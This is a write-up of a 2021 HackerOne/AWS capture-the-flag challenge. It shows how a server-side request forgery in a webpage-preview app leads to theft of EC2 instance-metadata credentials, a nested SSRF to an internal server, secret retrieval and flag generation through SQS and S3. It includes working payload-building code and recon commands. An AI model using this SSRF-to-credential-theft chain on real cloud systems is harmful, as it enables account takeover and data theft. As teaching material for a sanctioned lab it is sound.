HackerOne announced a time-limited CTF with AWS between April 5 and April 12, 2021. I thought http://flaws.cloud and http://flaws2.cloud were excellent preparation for it. The CTF awarded 26 points on HackerOne's CTF platform, which earns an invitation to a private bug bounty program (well, a spot in the queue for private invitations). It took me about an hour to complete the challenge and find the flag.
After registering and taking way too long to locate the HackerOne CTF landing site, I was presented with this application:
I ran a few tests with https://www.google.com and other sites to understand what the application was doing.

With `https://google.com`, I received an alert that the page was reached but did not respond with a 200. With `https://www.google.com`, the application loaded the website inside the iframe.
Behind the scenes in Burp, the application was responding with a status code and a base64-encoded response from the website.
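To illustrate the response shape (with a made-up body, not the real app's output), decoding the base64 `page` field is a one-liner:

```python
import base64
import json

# Hypothetical example of the API response shape described above;
# the real response was observed in Burp from /api/check_webpage.
raw = '{"status": "200", "page": "PGgxPkhlbGxvPC9oMT4="}'
data = json.loads(raw)
html = base64.b64decode(data["page"]).decode()
print(html)  # <h1>Hello</h1>
```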
If I looked at the source code on the webpage, I saw one script import to `/static/main.js` with the following content:
```javascript
document.getElementById("submit").onclick = function() {
    let webpage_address = document.getElementById("url_input").value;
    fetch(`/api/check_webpage?addr=${webpage_address}`)
        .then((response) => response.json())
        .then((data) => {
            // handle error cases
            if("err" in data) {
                alert(data["err"]);
                return;
            }
            if(parseInt(data["status"]) === 200) {
                document.getElementById("preview").src = `data:text/html;base64,${data["page"]}`;
            } else {
                alert("Page did not respond with '200 OK' but was reached.")
            }
        })
};
```
So the app would attempt to display the result of any webpage I give it? Nice! Just to confirm what I was seeing, I entered a Burp Collaborator address. Sure enough:
The first thing I wanted to try was the instance metadata URL: `http://169.254.169.254/`.
Oh boy!
This is a server-side request forgery (SSRF) vulnerability. I trick the application into making a second HTTP request, targeting a hostname that I cannot access but that the server can. SSRF does not always result in input back to the user (see blind SSRF in the link above), but thankfully it does in this case :)
Instance metadata resides on every EC2 instance (unless disabled) at the link-local address `http://169.254.169.254/`.
I actually wrote an article about how AWS added a mitigation to SSRF against instance metadata via version 2 of the instance metadata service (IMDSv2).
I’ll throw in a link to the Terraform parameter you want to set if you build infrastructure that way.
I proceeded to use IMDSv1 queries to retrieve instance credentials from this server. The instance profile attached to the server was `SSRFChallengeOneRole`. With the name of the instance profile, I could retrieve its temporary credentials. I had what I needed to access the AWS account.
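The path walk can be sketched as follows. This is a sketch, assuming the app's `/api/check_webpage?addr=` endpoint seen in `main.js`; the first metadata path lists role names, and the second returns the temporary credentials for the role discovered above.

```python
from urllib.parse import quote

# IMDSv1 endpoints, requested through the app's SSRF parameter.
targets = [
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/SSRFChallengeOneRole",
]

# URL-encode each target so it survives as a single `addr` query parameter.
ssrf_urls = [f"/api/check_webpage?addr={quote(t, safe='')}" for t in targets]
for u in ssrf_urls:
    print(u)
```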
Since this was a CTF and I could be as noisy as I'd like, my first step was to download weirdAAL and configure my credentials. I stored the instance profile credentials in my `~/.aws/credentials` file under the `ctf1` profile, so I merely needed to export `AWS_SHARED_CREDENTIALS_FILE` and `AWS_PROFILE` in order to configure weirdAAL after installation. I also set up the repo in a `pipenv` environment.
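For reference, the setup looked roughly like this (the key values are placeholders, not real credentials):

```shell
# ~/.aws/credentials -- instance profile credentials under the "ctf1" profile:
# [ctf1]
# aws_access_key_id     = ASIA...   # placeholder
# aws_secret_access_key = ...       # placeholder
# aws_session_token     = ...       # placeholder (instance creds are temporary)

export AWS_SHARED_CREDENTIALS_FILE="$HOME/.aws/credentials"
export AWS_PROFILE=ctf1
```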
Inside the `pipenv shell`, I ran the following to brute-force which permissions these credentials had on AWS. weirdAAL doesn't cover every AWS API, but it covers a good amount of the main services.
```shell
python weirdAAL.py -m recon_all -t aws-ctf
```
I could then view the permissions on this instance profile:
Secrets Manager?
That looks juicy.
Since I had `ec2.DescribeInstances` as well, I took a quick look at what servers were in the account.
After a bit of trial and error I realized the servers are hosted in us-west-2.
You could probably also figure that out by running `dig` on the personal hostname generated for you by the CTF challenge and correlating the result with https://docs.aws.amazon.com/general/latest/gr/aws-ip-ranges.html, but I wasn't in the mood.
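That correlation is easy to script. A sketch using a trimmed, illustrative sample of the `ip-ranges.json` structure (the real file from the link above is much larger, and the sample prefixes here are for illustration only):

```python
import ipaddress
import json

# Trimmed sample of the ip-ranges.json structure published by AWS.
sample = json.loads("""
{"prefixes": [
  {"ip_prefix": "35.160.0.0/13", "region": "us-west-2",      "service": "EC2"},
  {"ip_prefix": "3.5.140.0/22",  "region": "ap-northeast-2", "service": "AMAZON"}
]}
""")

def region_for(ip):
    # Return the region of the first prefix containing the address, else None.
    addr = ipaddress.ip_address(ip)
    for p in sample["prefixes"]:
        if addr in ipaddress.ip_network(p["ip_prefix"]):
            return p["region"]
    return None

print(region_for("35.163.1.1"))  # us-west-2
```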
After looking over the full response and then refining my request, I ended up with this query that displayed the data that I found interesting:
```shell
aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Tags[?Key==`Name`].Value,InstanceId,NetworkInterfaces[*].PrivateIpAddress]'
```
Notably, there were 3 challenge one servers and 1 “ChallengeTwo” server.
I guessed I needed to gain access to the challenge two server.
I noted it had a private IP address: `10.0.0.55`.
Another internal hostname I could target with SSRF…
Sure enough, entering `http://10.0.0.55/` in the application resulted in a response. I didn't get anything loaded in the iframe, but by inspecting the response I saw that my request was missing an `api_key` parameter.
I assumed this referred to a missing query parameter (as opposed to a header or body parameter), but I wasn't sure what value to provide. This is when I remembered that my credentials had access to list secrets in Secrets Manager.
Flags!
Unfortunately, I did not have permission to describe `h101_flag_secret_secondary` or `h101_flag_secret_main`. However, I could run `describe-secret` on `web_service_health_api_key` and get its secret value.
Hey, didn’t I just get asked to provide an API key?
I added this to my web request as `?api_key=<apikey>` and the service returned a good response:
Hmm, what do we have here?
I took a look at the HTML source of the `iframe` by right-clicking inside the window and selecting “View frame source.” That resulted in the following content:
```html
<!DOCTYPE html>
<html lang="en">
<head>
    <title>SERVICE HEALTH MONITOR</title>
    <style>
        .ok {
            color: green;
        }
        .err {
            color: red;
        }
    </style>
    <script>api_key = "hXjYspOr406dn93uKGmsCodNJg3c2oQM";</script>
</head>
<body>
    <h1>MACHINE STATUS</h1>
    <table id="status_table">
        <tr>
            <th>ADDR</th>
            <th>STATUS</th>
        </tr>
    </table>
</body>
<script src="/static/main.js"></script>
</html>
```
All right, so it is embedding my API key and then presumably doing something in `/static/main.js`. Let's take a look at what that is. Inspecting the iframe source again made the file content more readable:
```javascript
function fetch_machines() {
    return authenticated_fetch(`/api/get_machines`);
}

function fetch_system_status(addr) {
    return authenticated_fetch(`/api/get_status?addr=${addr}`);
}

function authenticated_fetch(addr) {
    let separator = addr.includes("?") ? "&" : "?";
    return fetch(`${addr}${separator}api_key=${api_key}`);
}

fetch_machines()
    .then((result) => result.json())
    .then((machine_addrs) => {
        machine_addrs.forEach((addr) => {
            fetch_system_status(addr)
                .then((result) => result.json())
                .then((data) => {
                    let status_table = document.getElementById("status_table");
                    let status_row = document.createElement("tr");
                    let machine_addr = document.createElement("td");
                    machine_addr.textContent = addr;
                    let machine_status = document.createElement("td");
                    machine_status.textContent = data["success"] ? "OK" : "UNREACHABLE";
                    machine_status.className = data["success"] ? "ok" : "err";
                    status_row.appendChild(machine_addr);
                    status_row.appendChild(machine_status);
                    status_table.appendChild(status_row);
                })
        });
    });
```
So the script attempts to run `fetch_machines` and populate the data in the iframe. When I attempted to query `/api/get_machines?api_key=<apikey>` myself, I received a 500 error from the server. I took that to mean the endpoint was intentionally (unintentionally?) not working, or at the very least that I didn't know what I needed to supply in order to receive a correct response.
However, the `/api/get_status` endpoint was interesting…

Ok, so similar to the request made by the current application (an API request with an `addr` query parameter), I needed to supply another `addr` for the second server.
Could this be… SSRF inception??
Yup.
Notably, you need to URL-encode the `&` separator (`%26`) and leave `http://` off the instance metadata URL in order to get a successful response.
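A sketch of how that nested payload can be assembled, using the endpoints observed above (the key detail is encoding the whole inner URL so the `&` reaches the second server as `%26`):

```python
from urllib.parse import quote

API_KEY = "hXjYspOr406dn93uKGmsCodNJg3c2oQM"  # recovered from the iframe source

# Inner target: the second server's get_status endpoint, which in turn
# fetches the metadata service. No "http://" on the metadata URL, as noted.
inner = ("http://10.0.0.55/api/get_status"
         "?addr=169.254.169.254/latest/meta-data/iam/security-credentials/"
         f"&api_key={API_KEY}")

# Encode the whole inner URL so "&" becomes %26 and is not consumed
# by the outer application's query string parsing.
payload = f"/api/check_webpage?addr={quote(inner, safe='')}"
print(payload)
```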
The ChallengeTwo server was using the instance profile `SSRFChallengeTwoRole`:
I finished the SSRF payload to retrieve credentials for this role and added another profile to my aws credentials file.
Because the data comes back inside a JSON object in the response, you have to un-escape characters. I found the easiest way was to pipe the content into `jq` and let it give me the data.
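The un-escaping is just a second round of JSON decoding, which is what `jq` handles for you. A sketch with a hypothetical response shape and placeholder credential values:

```python
import json

# Hypothetical outer response carrying the credentials as an escaped JSON
# string; two rounds of decoding recover the individual fields.
outer = '{"page": "{\\"AccessKeyId\\": \\"ASIAEXAMPLE\\", \\"SecretAccessKey\\": \\"abc123\\"}"}'
creds = json.loads(json.loads(outer)["page"])
print(creds["AccessKeyId"])  # ASIAEXAMPLE
```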
I ran weirdAAL on these new credentials to see what I could do:
I could no longer describe EC2 instances, but I could list S3 buckets and I could still list secrets!
I still couldn't describe `h101_flag_secret_main`, but I was able to retrieve the value inside `h101_flag_secret_secondary`.
I am still not sure what that value was for.
Maybe to correlate to part of the final flag at the end?
In any case, I didn’t find a use for this value.
Now, let’s try to list S3 Buckets…
I couldn't list the contents of `h101-flag-files` (although that doesn't mean I can't retrieve files from this bucket if I know the exact path, as we will see later). I also couldn't list `h101ctfloadbalancerlogs`, but I wasn't interested in those logs. In `h101-dev-notes`, I found a `README.md` file and downloaded it.
# Flag Generation
This document outlines the steps required to generate a flag file.
## Steps
1. Fetch your `hid` and `fid` values from the `/api/_internal/87tbv6rg6hojn9n7h9t/get_hid` endpoint.
2. Send a message to the SQS queue `flag_file_generator` with the following format
```json
{"fid": "<fid>", "hid": "<hid>"}
```
where `<fid>` and `<hid>` are the values you received in step 1.
3. Get the `<fid>.flag` file from the `flag-files` (name may be slightly different) S3 bucket.
## Tips
If you've never worked with SQS (Simple Queue Service) before then the [following link](https://docs.aws.amazon.com/cli/latest/reference/sqs/send-message.html)
may be helpful in sending messages from the aws cli tool.
Instructions on how to generate my flag!
I had to make a new SSRF request to receive `fid` and `hid` values, then pass those values as a message to an SQS queue. This queue triggers the creation of a flag file in the `h101-flag-files` bucket, at which point it seems I can make a direct copy request to retrieve the flag.
Now, I didn’t see SQS permissions in my readout from weirdAAL, but that may be a service that isn’t fully covered by the tool - I didn’t check.
I figured that if the instructions told me to do it, I would have the permissions.
Let’s go.
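Per the README, the message body is a small JSON object. A sketch of building it (the `fid` and `hid` values here are placeholders; the real ones come from the `get_hid` endpoint via SSRF), with the CLI send from the README's tip shown as a comment:

```python
import json

# Placeholder ids -- substitute the values returned by the get_hid endpoint.
fid = "example-fid"
hid = "example-hid"

message = json.dumps({"fid": fid, "hid": hid})
print(message)

# The actual send would use the AWS CLI, roughly:
#   aws sqs send-message --queue-url <url from aws sqs get-queue-url> \
#       --message-body "$MESSAGE"
```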
With these values saved to a file, I then needed to determine which SQS queue to send the message to. I knew the name of the queue was `flag_file_generator`, so:
Now I can send the message:
I got the flag!
Inside this file was a flag to submit to the AWS CTF challenge page, which in turn produced a HackerOne CTF flag to submit to the main CTF page.